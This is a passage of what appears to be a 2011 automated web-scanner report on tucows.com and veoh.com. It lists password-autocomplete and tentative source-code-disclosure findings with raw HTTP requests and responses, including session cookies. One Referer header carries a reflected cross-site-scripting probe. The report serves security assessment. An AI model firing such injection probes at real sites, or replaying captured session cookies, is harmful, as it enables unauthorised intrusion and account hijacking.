<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.99. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.100. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.101. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.102. http://www.veoh.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.103. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.104. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.105. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.106. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.107. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

14.108. http://www.veoh.com/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>

       <form id="form-register" method="POST">

           <fieldset>
...[SNIP]...
</label>
               
<input type="password" name="password" id="password" value="" />                
               <label for="password2">
...[SNIP]...
</label>
               
<input type="password" name="password2" id="password2" value="" />                
               <label for="countryId">
...[SNIP]...

15. Source code disclosure  previous  next
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


15.1. http://advertise.tucows.com/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /includes/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:21:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 11 Feb 2010 01:05:35 GMT
ETag: "454e8-adf-47f48bf8e75c0"
Accept-Ranges: bytes
Content-Length: 2783
Cache-Control: max-age=604800
Expires: Fri, 11 Feb 2011 02:21:40 GMT
Content-Type: application/javascript

function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {

   var bAsync = (bAsync == null ? true : bAsync);
   var req;
   
   try {
       req = new XMLHttpRequest();                                                    /* e.g. Firefox
...[SNIP]...
or request variable. For example,
// assuming you used javascript to set a cookie called "php_array"
// to the value of a javascript array then you can restore the cookie
// from PHP like this:
// <?php
// session_start();
// $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array'])));
// print_r ($my_array);
// ?>

// /* This automatically converts both keys and values to strings.
// The return string is not URL escaped, so you must call the
// Javascript "escape()" function before you pass this string to PHP. *
...[SNIP]...

15.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://fpdownload.macromedia.com
Path:   /get/flashplayer/current/swflash.cab

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT
ETag: "b72012-2a53a6-9bea6bc0"
Accept-Ranges: bytes
Content-Length: 2773926
Content-Type: text/plain
Date: Thu, 03 Feb 2011 22:06:12 GMT
Connection: close

MSCF.....=*.....D............................=*.................W..............;.s .swflash.inf..%+.......U=.. .FP_AX_CAB_INSTALLER.exe...~..@..[...
.`;v."Sp$......g...BN..0.C.8AH+..
0..H.....pv.90.;.
...[SNIP]...
<,..j.i......e.?Y0..N.}/..d..YfdD.Hs...g..l.:...<?.....*az..Bu.)~...U5B...&ZGe..[...q.a.K~....M.....wg......+....]..D.....f....D..r.1L...'..3q.H.NJk.........8.O.0.....b....kz.W_..M.'C>....(.....k.k....).h#.&....<.(.X.oL)..Y..Y........e.L.F.D.UW.(.AQ.u...8LK1It........^P...3l.....e.<g.8A..IZ........-....5t).T...^.|..p..Kn..'.F(.YQ7.T..M....c..@.`!&K.......;Y&.,...u..!1.Ir..8......-.s_....QK%^...'s........\i"..R*..S....e.P.t.}..E.....[}l
P.....}....k@.....$-.RG...a..\t....sKtFW|c]....B.....0Kw..*DR..)s2]6.x.v.J.......+.]q...i...V|...bJ...z._|..U.9.v.#.sM~......kU...BOB
.@..?zu.%K&dhJs(.    .R....._.P._...U..n.8....|.....3........l.7@......,..Qpj..Is..r...Zc.....g.....e..R.w...&..
.X%.A...i|B.....%U\Y...*NgZ........    J7...H$6..*...>d/..._
.......Y....#f.6..S*5LuLZ...=IY.T.I.....].]*..............?....cS.!.....K.....~.... ...'.A..{9^.X.....!.'.5.:.\.APO{....~....,<x..~..r...x.....pL.....R...S..q@*H.N:..{.Q..Us1(.ju..+D.....    &....).....|d..G....zQ.h.]....M..(.....+..z5..^.....".^.'..O.%D.......K....@.f... ].D~........9.jQ.......Q....g_
7.P...JL.F......a...o...i@W03P....)...>lI....'.h.......(z..g31.x    ....=".u.Y..j.n.:m..5,).q6S.xI.>.....q.M|_...<......&..&.E4.......A.c(..........=.+...E.....u...$.Y9...u..K.JW.G.7.{n...pjU...R..>/.....qx.o.*..m_..T....y..:.v.w.:.ws;.;....n.}'...#.....................dw.;o..;f..;d..N...#v..p...Vwl;@;c;r:...l;.:^.l.|:..Hv(w...u2...C....;.;h..;o...\...u...:a.Gj.........0>bg)..J.)>....|......G.q.4..mL...}A......... ].4...jC,....~....^.f...........'...i........x.......).*./pp.K9.;.1^.
..?.xRD.zC)....."    .....b......ZMt-.R%.h...z....xV.!M.Q.8..r..:......+......!.y...7....1i&8...h.."MG]).w....o.4
0t&.....1.._........Is......I._:.....NQLT6l9.(:.3~....^q...M..v.D2......[....V\.R....\T..i..C,..z....uQ.+Z.%V...i.%.<p.If.>..`......Q.......B.....D.. ..T..h.qa..C".i..Q.J8.......g...p...._x.....2\.9?...
.q.zP4...>....X..    ....;+C....!7.dS..9..9..........|.x..IS.:.....IDF..LYV.2I$...)Z...=..H.o)..u......[{.m.n...{~...............    .........()..j..^<....     ..I.N..(....4..!..I.SIv.9^.bF....6q..<.%.]Q..!..{..O..m\b..}.YBJ.h.`..n*.ZA.
.s....$_0U..'.. ..r*..!l.P>.s..LN.X.I
X.....8o...l..,.h",..u.......M.9.J....$pI..16.&.l.*....E...[.........Q..;.L...........]S|2"...!...o.<.....G..=.....E...O..a.$...B;.    c..MI.....$.AfE.w.>.....*.BW....`N......
./N.....9..r".........J....2..X...C.... ....d$...=.Vi...[.V4..q...dQc....T#.2.K.L........1...b.m..w.... ....`....D.Q..fb3&..o..P7..a....1..........V=V..":a... ...H...l......Mxm..r+..........KN.#w.C.]Cu.K.H..m..O..0{..>....>.2P........Tg..y.zS.::.n....D.0.8.;.u...;2.%`......t.._^.........J....R=.........&..>..O..4.............;a....r....Hg9...;Y%y..(.\....Cf..~=C,....=w.x....:..g^.k0.w....r.GivE.._...q.gAFrCU....i.)..\L......e1.......|k...D..z...]'...1\v.Y~...#*..<.q.4..<.}.p".....H.Lc....e...XfknkLgD..G....JPT.]?...."(.....4.\....v.K....)
Q...<i'.`..G.U...U..+!...:.0..KS.;..Y...fv.p\-....)X..G    7:...K.WX...3.
I.../.Q.........#.ct.&.0..f`.0.B...a..9......&..rwQ.....y..K6U."........F..cK.h.&d...,dM..........!..Z(...(ir.!....#..`.m.2.:8UtNRMR8......Z6.........T...`...P.^...5.K3#.#...#F........$...M...Q.....}.<..T.K.dSj....J,z..>...'fu..'T......>rq..}..)[.h.......*Yg....J.u...?..w.+.aO....    ~xS...bk..]h_G....I.Wx..n..u.....lw......T.T.-.....].........a.b.....k..8..my...VqX....D..........l...Q:...$....U.I..H.97.._$k........M.~....)U.tf..p .W.......W.4.R....=S...8.l.f.=k...4*..\.m.i.wS...Y[    9..Rg...6feE@6...o....&RI........JA..F
'...q$    ..e.."..c....<*.gjg...
